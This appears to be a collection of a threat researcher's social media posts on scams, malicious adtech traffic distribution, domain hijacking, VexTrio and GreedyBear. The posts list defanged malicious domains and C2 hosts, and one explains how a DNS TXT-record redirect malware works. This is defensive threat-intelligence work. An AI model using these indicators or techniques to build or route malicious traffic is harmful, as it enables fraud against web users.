| https://www.linkedin.com/in/ren%C3%A9e-burton-b7161110b/ |
Fucking scammers.
Earlier this week i figured out that my mother-in-laws attempted scammer was running in azure. 8thoctioserror3[.]z13[.]web[.]core[.]windows[.]net
Then her brother-in-law showed me text messages this afternoon from scammers trying to get his Bitcoin at Coinbase. lovely.
Then our kiddo gets this lovely pop up trying to read restaurant reviews just now.
redinstantnews[.]shop
is yet again some #tds hiding in cloudflare likely running a ton of fraud.
The most controversial topic in Seattle might be outdoor cats, so a No Kings protest is like a city-wide block party drawing 90k people and lots of silliness.
At the April protests, white middle age women were way overrepresented ... this was not the case yesterday. I saw all ages, all colors,... all kinds of diversity.
Super proud of #seattle #nokings #protest ... and fuck the furlough.
for the record, i have no position on outdoor cats. too dicey.
JFC. of course the Google News bullshit leads to push notifications: the parasite of the advertising world.
Decided to click on one of these amazing news articles from a live connection, and sure enough -- some crappy domain wants to send notifications.
the notifications that follow are all fake news so far.. where they then caveat in the story that it's fake lol. primary purpose seems to be getting ad revenue w/ tons of on page crap. rather than a direct scam.
domains i've seen so far seem to have lapsed and the actor grabbed them. No bueno dudes.
still completely baffled at how Google is delivering the initial "news" notification. insights welcome.
say no to push. fng parasites.
#dns #threatintel #scam #adtech #fakenews #infosec #cybercrime #cybersecurity
This was a bit wild and I don't understand SEO or Google News well enough to grok the whole thing, but certainly got the DNS part lol.
An obviously fake news about Trump stimulus came across a phone but from Google - at least it seemed that way. I see these same fake stimulus lures all the time in the opt-in scam-riddled push systems, but this was surprising.
Turns out a University organization had let their domain lapse and it seems almost instantly picked up by bad dudes.
There are now a ton of fake articles with clickbait titles. But the articles all qualify in the middle that they are fake. There's no ads on the page. You can leave a comment and email - who would do that?
I saw other sites citing this "news", so clearly a web of some kind. but i am clearly missing something. How did Google send this out? Presumably leveraging the University domain reputation, but as an ad? What's the goal of all these mea culpa fake sites?
The one thing i know for sure, is don't drop your domain. that bad guy now has access to your emails.
#threatintel #dns #cybercrime #scam #seo #adtech #cybersecurity #infosec
oh look-see, a Swiss ASN providing services for Russian cybercriminals running crypto theft / scam operations with malicious browser plugins. Research by Koi who call this operator GreedyBear.
Several months ago, GreedyBear started delivering a bitcoin mining scam that I documented almost a year ago from my phone.
mine was at globalminingbit[.]top on Proton66. I have a full 16 min video of the scam. This bitcoin mining scam appears to be a template. the one i experienced used u/o parameters.
according to Koi, GreedyBear has collected at least $1M.. Data indicates GreedyBear is likely operating affiliate "advertising" where they feed the crypto scammers in Russian/BPH hosting space. From a swiss network.
Shockingly, GreedyBear also redirected to these same bitcoin mining scams on Proton66 (different IP).... what a small world. So much to say, so little space.
worth a read. I'd not heard of Koi before. they are former Israeli intel. so probably won't be pressured into taking shit down.
#threatintel #cybercrime #scam #malware #phishing #cybersecurity #infosec
https://www.koi.ai/blog/greedybear-650-attack-tools-one-coordinated-campaign
This was popular on LinkedIn so figured I'd share here... honestly, i'm always a bit amazed how much people love things about DNS hijacking. Anyhooo...
Finding domain hijacking at scale is hard. We do a lot of it.
But finding examples of domain hijacks - specifically ones by Russian cybercriminals driving users into malicious adtech TDS is trivial.
Just search any porn related term and they will pop up. Various sports terms work well too. You can limit the results to microsoft, azure, s3, etc. and get even clearer results.
These are the same actor that hijacked the CDC subdomains back in March and that we wrote about a few months ago.
#dns #threatintel #cybercrime #scam #malware #cybersecurity #infosec #Infoblox
so it turns out i'm worth about 5 cents. but those pennies add up for the malicious adtech guyz to hundreds of dollars.
i'm somewhat obsessed with push notification. they are such a brilliant way to persist on a hapless person's device. over nearly a year of poking about my mom's sacrificial phone, i've been particularly impressed by:
* how little visibility security products have on the notification server domains,
* in combination with how much data they create. loads and loads.
but also the man in the middle gets to scam all the peeps. See.. for every notification I see, they get to charge someone else for the impression. one network i was looking at last week has sent me over 1000 notifications... and they leak a lot of info about the auction, so i know they earned about $500 on those... but they also record that my conversion likelihood is near zero. They will send 4-6 notices all at once. so even if i were to engage, it's a crapshoot for the 4-6 bidders who paid to basically show the same lure.
and it's not just me... this network has several domains in the top 10k globally as ranked by Tranco... a few in the top 5k... that's a lot of queries! probably each gaining 1-5 cents. not bad.
now for all of this to work, they need to show images. these are precious domains and servers for their business model.
and i'm a bit devilish. wouldn't it be fun if everyone just blocked access to their image servers? I mean, we do. ;)
#scam #tds #threatintel #cybercrime #cybersecurity #infosec #dns #adtech #Infoblox
Scammers DO take vacations. Lots of them. These are social media from VexTrio key figures - tons more where these came from.
Don't blame the victim, blame the guy on a private jet to a Coldplay concert. fr fr.
#threatintel #cybercrime #cybersecurity #infosec #scam #VexTrio #tds #malware #phishing
VexTrio's origins come from two distinct groups: an Italian group we can date back to 2004 and a Russian-speaking Eastern European group. The Italians were quite successful early on, with a dating app that was among the fastest growing on Facebook in 2012. But our guess is that their profits slid in the years that followed. In 2020, there is an merger-acquisition which leaves the Eastern Europeans in charge. They gain the trademarks, knowledge in spam distribution, and who knows what else.
While developers remain in eastern Europe, VexTrio created business headquarters in Lugano, Switzerland. Including the existing AdsPro, which developed the Los Pollos, Taco Loco, and Adtrafico traffic distribution systems (TDS) through their software company HolaCode. (ok it's more complicated than that, but this is the cliffsnotes version). We have identified nearly 100 businesses associated with 8 key figures in many industries, including construction, energy, and advertising.
So in the end, what is VexTrio? It's hard to say. We originally used it to refer to the TDS. Nice clean lines... but now, for us it is all the people and their labyrinth of companies.
We spoke at BlackHat last week so if you have a briefings pass you can listen to that. Otherwise, find our research online and start your own investigation.
#dns #threatintel #scam #cybercrime #vextrio #infoblox #cybersecurity #infosec #malware #tds
snackable 3/N on VexTrio and the WordPress hackers. This one's a bit geeky. One type of malware that led to VexTrio exclusively until late-Nov 2024 uses DNS TXT records to retrieve a redirection.
This is a tricky bugger and gives the malware actor an easy way to change things up if they are disrupted. The C2 domain (a DNS nameserver) isn't observed and the calls happen server side. The DNS TXT record malware was first observed by Sucuri/GoDaddy in 2023.
A compromised website makes a DNS TXT query that encodes the visitor's information and receives a redirection encoded in the response. When DNS queries to the C2 is blocked in the website's network, the visitor is protected -- we have had customers with compromised websites who still protected their users as we blocked the DNS query.
This malware is stubborn and is tricky to get rid of... there are also bots that come through regularly and update the compromised servers.
We used 4.5 million DNS queries over ~6 month period to understand how the C2 and redirect domains interrelated. What we found were two distinct clusters (this is the really geeky part) that indicate separate operations. Both use bulletproof hosting and/or Russian hosting, both were exclusively VexTrio, and both in late-November switched to the Help TDS. They used a few different paths to get to VexTrio's Los Pollos links.
One of these clusters had not been previously reported to our knowledge.
What you see in this image is a composite view. The C2 for each cluster are:
* data-cheklo[.]world, cndatalos[.]com, data-infox[.]com
* logs-web[.]com, airlogs[.]net, webdmonitor[.]io, cloudstats[.]net, etc.
webdmonitor[.]io is still active.
#dns #threatintel #cybercrime #cybersecurity #infosec #malware #scam #VexTrio #tds
